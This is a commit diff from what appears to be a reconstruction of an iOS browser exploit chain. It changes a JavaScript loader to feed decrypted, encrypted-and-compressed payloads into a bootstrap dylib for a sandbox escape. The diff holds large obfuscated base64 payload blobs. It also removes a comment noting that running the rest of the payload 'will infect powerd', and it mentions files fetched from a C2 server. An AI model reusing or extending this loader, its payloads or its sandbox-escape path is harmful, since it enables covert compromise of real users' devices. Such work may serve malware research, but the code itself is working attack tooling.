Now load payloads from decrypted files

2026-04-23 04:06:22 +02:00 · 2026-03-08 06:41:11 +07:00
parent 8e204b1c1c
commit d1f2483377
118 changed files with 686 additions and 13 deletions
@@ -1,5 +1 @@
-// This will be removed later
-let shouldIReload = confirm("this js loaded means it works. Press OK to reload page. Cancel will let the rest of payload execute which will infect powerd.");
-if (shouldIReload == true) location.reload();
-
-window["qbrdr"]("bxfeZl2xvYC6gX6EmDhACuA6itGK9GGx2UiuruNtIRcV0p3s84ugiS9OQtk8L0SN8G0+dho5Gn9BsNXNRhlv4GFFNbl7KzWh62+TdHObjr8s0nQ8dc/7Wq8kakweptmSavpcri/SiW7fO3C4SMqWyfvNxZ2EzHnFQcDoOTJXvFowSTwaRaz4lEgNigCkYg7lZ9ij3uFJ026KMblXuLEn2flUx2I4AL0XZ75FEnlRdVOl8nAAhFqdcTdewjmyhkUruXyqWzw5I4HidHxtzPPmmAmR6wH5ggI5lPsxDgatQt5dtUVjj6dJTyLwY41mfVX4jLXnrhWw8UdOFqOuY5G9PlbyEMKO0klyU+e3E7YRYDvJrBsUWQs/JEOCt1Gj0Dx/RHrflrEPj/WUkEhpDfXvCI08i1e6Kb/h7EZYL6a2fiVWfjW40YTfRANypoExO/3ZokYpn6HgeIXOuzxY5WvuH48IA3gfgsOE0qqFbhqTy0ZoESzqeQFgoK9uX+8t+OFv0RZqbCjL5/tYJRoKHKvqIDTAzKZ3Vk6EwJMsFhkOyo8Dkao7x+zrEV7/SuNjzBX2KFUwACvtBOKc3+EqvcMZ1gFh9DSH6yodOBJEFW5G/H7c7g7Yd5d4WLdeFDYGlfvK2H1E/TEgYv7WSF/UxV35xf5C7o7J4Qt6IcR3gp8U/KfLuVo5MEzH2rW6mj0GT+fYwHoDzYrO9xmp407ewYyLwGBT5Wke3453Z/cTBW8mqYfCUPywUQQdT4tGUcqzpWbvySeDzYOT+sbJN/8w3IqkOgYBzQ722SJd6xa1zHGKCcRGs8xpArMTGz6VnnhTlYMXw+YE0xgi00Gel3+8Rw3BLOswZzD2T6R7KA+5EiM6nvnJvxRgSLNQoZbemdlZFaeJv+3aU+6XAMfWG+j6rSE1SntaX+DxWgIelb6cuH0dE3ZChHM6JgLXOhe+WavOAfqLShRFLpP0zKmO4cvDNCnvUxGc0O8f8fXdFryzvKxZ054zwo+2TGYuKE+2//CY0jCIHO9xXvWPZADdPEm7dchpQ5iYySar8Oyz/2lUnomirCbzwucBC97rPsKMfM1JvbKAScKHn/ekil2b5aXgEImu7jb40lDz5GU2nYFYLMBPOxpYxpBtwnlKOsS4UfF24oHd8K64FaXuQzLCIiuTGnjybTk7ybYQpoygrnpWe4r9r4FmW2grw/P8pMegqP4SL0swwU0IUAInSSG4+T6Ak3u3uUZumvD/Z2mGA4rJFzIZ+UZlB+baZ+rcOv48A0h7n5D4XlXAMPGrhcEw3EmTwR7IYRZIUHXEI5dZsTKm6tY5935OtHP7lzZo2fNzFehEjsCdULQ7yRb3Ggh2DJl9KMZh6DhArhcudxSudd0qF/XStbQeuBFr3jpSYTeoraLuiqMGs70CDhy+e4k3/T9yWCULrfGV4aa0XKpmvmfkI+wJOXlyPSdlFnejJrbKf7ZUN6+CPdW1jsfQXoV626CIOROm8klSsqxU8FtrDw1kpR+bdEFQ/eXDUhd1Tqk6uevdP5pIcEkxuefBmSzABe9j4XvrjIB1ZQgn0sMIwFUCLynTTxfcOdxVc645ZM+Ljop14IsiGXX6Dbqk1BKUnG2DkXz9+0Qe7btzue1VQSub685/c89zZKr6lEvnBjaG8wqjl5vJd90my7jhqPdD5aLuvPl3SRtbYLzGSgHIpWn8iu4X8IqWN+tsjg17QBcR3Y4xTKwhqxyxjD/VEBgwt7KCid6/L+qtec4+npBl");
+window["qbrdr"]("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");
@@ -36,7 +36,7 @@ Payloads go through the following layers (outermost first):
  - 64-bit block counter (starting at 0)
  - 64-bit nonce (all zeros)
  - 20 rounds (10 double-rounds)
- **Implementation**: Found at offset `0xad8c` in `Stage3ValidatorOrSomething.dylib`
+- **Implementation**: Found at offset `0xad8c` in `bootstrap.dylib`
 - **Sigma constant**: Standard `"expand 32-byte k"` at offset `0xbb80`

 ### LZMA Compression
@@ -164,7 +164,7 @@ coruna-main/
 ├── utility_module.js               # Crypto helpers, Int64, LZW
 ├── Stage3_VariantB.js              # Sandbox escape + MachOPayloadBuilder
 ├── other/
-│   └── Stage3ValidatorOrSomething.dylib  # Extracted dylib with ChaCha20 + LZMA
+│   └── bootstrap.dylib  # Extracted dylib with ChaCha20 + LZMA
 ├── downloaded/                     # 17 files fetched from C2 server
 │   └── <hash>.min.js               # Raw encrypted payloads
 ├── extracted/                      # Base64-decoded qbrdr payloads (from repo JS files)
@@ -1244,10 +1244,11 @@ function YA() {/* Original: YA → resolveSymbols */
                    if (lastSlash >= 0) hashName = hashName.substring(lastSlash + 1);
                    hashName = hashName.replace(/\.min\.js$/, "").replace(/\.js$/, "");

+                    // Fetch decrypted F00DBEEF container from payloads/ directory
                    window.log("[LOADER] Loading payload: " + hashName);
                    const container = await E.buildContainer(hashName);
                    E.feedRawBuffer(container);
-                    window.log("[LOADER] Payload fed to dylib: " + hashName);
+                    window.log("[LOADER] Fed " + container.byteLength + " bytes for " + hashName);
                } catch (err) {
                    window.log("[LOADER] Download error: " + err);
                    M();
@@ -1255,7 +1256,6 @@ function YA() {/* Original: YA → resolveSymbols */
            })();
        },
        UA(A) {
-            // Legacy path — no longer used, download() feeds raw buffers directly
            E.feedRawBuffer(A);
        },
        sA() {
@@ -1326,7 +1326,7 @@ function executeSandboxEscape() {/* Original: yA → executeSandboxEscape */
        // Dylib must be pre-truncated to Mach-O proper (no appended data).
        const _ORIG_PROCESS_OFF = 0x68d8; // hardcoded in B trampoline shellcode
        const _xhr = new XMLHttpRequest();
-        _xhr.open("GET", "other/Stage3ValidatorOrSomething.dylib", false);
+        _xhr.open("GET", "payloads/bootstrap.dylib", false);
        _xhr.overrideMimeType("text/plain; charset=x-user-defined");
        _xhr.send();
        const _raw = _xhr.responseText;
@@ -290,7 +290,7 @@
            //   - Script base URL (decoded from fqMaGkNg)
            //   - Cookie/session data (from fqMaGkN4 with encoded params)
            //   - Platform and user agent strings
-            if (await platformModule.init("", fqMaGkNg(), fqMaGkN4([3436285875, 2332907478, 2884495420, 233193687, 1144711575, 1605576699, 1942246444, 1994816675]), Array(!1)[0], Array(!1)[0], platform, userAgent), platformModule.On()) throw Error("");
+            if (await platformModule.init("", fqMaGkNg(), "", Array(!1)[0], Array(!1)[0], platform, userAgent), platformModule.On()) throw Error("");
            window.log(`[PLATFORM] iOS version detected: ${platformModule.platformState.iOSVersion}`);

            // Version check: must be >= 130000 (iOS 13.0)
--- a/Show More
+++ b/Show More